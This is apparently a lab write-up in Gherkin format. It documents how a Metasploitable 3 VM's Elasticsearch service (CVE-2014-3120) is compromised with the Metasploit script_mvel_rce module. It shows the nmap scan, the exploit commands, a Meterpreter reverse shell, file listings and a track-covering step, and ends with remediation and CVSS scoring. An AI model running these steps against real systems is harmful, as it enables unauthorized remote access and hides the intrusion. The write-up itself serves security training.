## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable 3
  Location:
    10.0.0.235:9200 TCP
  CWE:
    CWE-306: Missing Authentication for Critical Function
      https://cwe.mitre.org/data/definitions/306.html
  Rule:
    REQ.264: https://fluidattacks.com/web/rules/264/
  Goal:
    Gain access to the system
  Recommendation:
    Enforce Authentication for all non-public acessible resources

  Background:
  Hacker's software:
    | <Software name>        | <Version>   |
    | Kali GNU/Linux Rolling | 2020.2a     |
    | Nmap                   | 7.80        |
    | Metasploit             | 5.0.87-dev  |

  TOE information:
    Given I am running a Metasploitable 3 windows VM at
    """
    10.0.0.235
    """
  Scenario: Normal use case
    Given I have the appropiate credentials
    When I enter them
    Then I have access to Elastic Search

  Scenario: Dynamic detection
    Given I Scan the target machine
    When I scan the ports with
    """
    $ nmap -p0- 10.0.0.235
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 10:09 EDT
    Nmap scan report for 10.0.0.235
    Host is up (0.00048s latency).
    Not shown: 65517 filtered ports
    PORT      STATE SERVICE
    21/tcp    open  ftp
    22/tcp    open  ssh
    80/tcp    open  http
    1617/tcp  open  nimrod-agent
    4848/tcp  open  appserv-http
    5985/tcp  open  wsman
    8020/tcp  open  intu-ec-svcdisc
    8022/tcp  open  oa-system
    8027/tcp  open  unknown
    8080/tcp  open  http-proxy
    8282/tcp  open  libelle
    8383/tcp  open  m2mservices
    8484/tcp  open  unknown
    8585/tcp  open  unknown
    9200/tcp  open  wap-wsp
    49153/tcp open  unknown
    49155/tcp open  unknown
    49176/tcp open  unknown
    49177/tcp open  unknown

    Nmap done: 1 IP address (1 host up) scanned in 125.27 seconds
    """
    Then I notice that the default port for Elastic Search is open
    """
    9200/tcp  open  wap-wsp
    """
    And I Think that maybe the configuration for Elastic Search is the default

  Scenario: Exploitation
    Given That I suppouse that the Elastic Search config is the default one
    When I search for vulnerabilities, I Found
    """
    https://nvd.nist.gov/vuln/detail/CVE-2014-3120
    """
    Then I also found that Metasploit has an exploit for that vulnerability
    """
    exploit/multi/elasticsearch/script_mvel_rce
    """
    Given I found that an exploit in Metasploit exists
    When I select the exploit and set required information, I get
    """
    msf5 > use exploit/multi/elasticsearch/script_mvel_rce
    msf5 exploit(multi/elasticsearch/script_mvel_rce) > show options

    Module options (exploit/multi/elasticsearch/script_mvel_rce):

      Name         Current Setting  Required  Description
      ----         ---------------  --------  -----------
      Proxies                       no        A proxy chain of format type:h...
      RHOSTS                        yes       The target host(s), range CIDR...
      SSL          false            no        Negotiate SSL/TLS for outgoing...
      TARGETURI    /                yes       The path to the ElasticSearch...
      VHOST                         no        HTTP server virtual host
      WritableDir  /tmp             yes       A directory where we can write...

    Exploit target:

      Id  Name
      --  ----
      0   ElasticSearch 1.1.1 / Automatic

    msf5 exploit(multi/elasticsearch/script_mvel_rce) > set RHOSTS 10.0.0.235
    RHOSTS => 10.0.0.235
    """
    Then I use the exploit and get the following output
    """
    msf5 exploit(multi/elasticsearch/script_mvel_rce) > exploit

    [*] Started reverse TCP handler on 10.0.0.233:4444
    [*] Trying to execute arbitrary Java...
    [*] Discovering remote OS...
    [+] Remote OS is 'Windows Server 2008 R2'
    [*] Discovering TEMP path
    [+] TEMP path identified: 'C:\Windows\TEMP\'
    [*] Sending stage (53905 bytes) to 10.0.0.235
    [*] Meterpreter session 1 opened (10.0.0.233:4444 -> 10.0.0.235:49484) at
    2020-07-21 12:52:17 -0400
    [!] This exploit may require manual cleanup of 'C:\Windows\TEMP\wgYO.jar'
    on the target
    meterpreter >
    """
    And I procede to check if I am indeed in the system
    """
    meterpreter > ls
    Listing: C:\Program Files\elasticsearch-1.1.1
    =============================================

    Mode              Size   Type  Last modified              Name
    ----              ----   ----  -------------              ----
    100776/rwxrwxrw-  11358  fil   2014-02-12 11:35:54 -0500  LICENSE.txt
    100776/rwxrwxrw-  150    fil   2014-03-25 18:38:22 -0400  NOTICE.txt
    100776/rwxrwxrw-  8093   fil   2014-03-25 18:38:22 -0400  README.textile
    40776/rwxrwxrw-   4096   dir   2014-04-16 17:28:54 -0400  bin
    40776/rwxrwxrw-   0      dir   2014-04-16 17:28:54 -0400  config
    40776/rwxrwxrw-   0      dir   2020-05-13 11:03:04 -0400  data
    40776/rwxrwxrw-   8192   dir   2014-04-16 17:28:54 -0400  lib
    40776/rwxrwxrw-   8192   dir   2020-07-21 12:37:25 -0400  logs

    meterpreter > cd
    cd bin     cd config  cd data    cd lib     cd logs
    meterpreter > cd C://
    meterpreter > ls
    Listing: C:\
    ============

    Mode              Size        Type  Last modified              Name
    ----              ----        ----  -------------              ----
    40777/rwxrwxrwx   0           dir   2009-07-13 22:34:39 -0400  $Recycle.Bin
    100555/r-xr-xr-x  8192        fil   2020-05-13 11:17:10 -0400  BOOTSECT.BAK
    40777/rwxrwxrwx   4096        dir   2020-05-13 11:17:10 -0400  Boot
    40776/rwxrwxrw-   4096        dir   2020-05-13 10:31:14 -0400  Documents...
    40776/rwxrwxrw-   0           dir   2020-05-13 10:58:42 -0400  ManageEngine
    40776/rwxrwxrw-   0           dir   2009-07-13 23:20:08 -0400  PerfLogs
    40776/rwxrwxrw-   4096        dir   2020-05-13 11:04:11 -0400  Program ...
    40776/rwxrwxrw-   4096        dir   2020-05-13 10:58:41 -0400  Program F...
    40777/rwxrwxrwx   4096        dir   2020-05-13 10:34:06 -0400  ProgramData
    ...
    40776/rwxrwxrw-   4096        dir   2020-05-13 10:45:25 -0400  wamp
    """
    Then I can conclude that I am in the system

  Scenario: Covering tracks
    Given The exploit
    """
    exploit/multi/elasticsearch/script_mvel_rce
    """
    When It is executed, it leaves the following file in the target system
    """
    C:\Windows\TEMP\wgYO.jar
    """
    Then I need to manually delete the file with
    """
    rm wgYO.jar
    """
    When That fails, I conclude that privilege escalation is required
    And Without deleting the file, the hacker might be discovered

  Scenario: Remediation
    Given I am in the Elastic Search Configuration directory
    When I open
    """
    elasticsearch.yml
    """
    Then I enable the security settings with the following line
    """
    xpack.security.enabled: true
    """
    And to change the default password for the default user, I execute
    """
    bin/elasticsearch-setup-passwords interactive
    """
    When I try to execute the exploit again, It no longer works
    And I conclude that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.3/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.0/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.1/10 (Medium) - CR:M/IR:L/AR:L
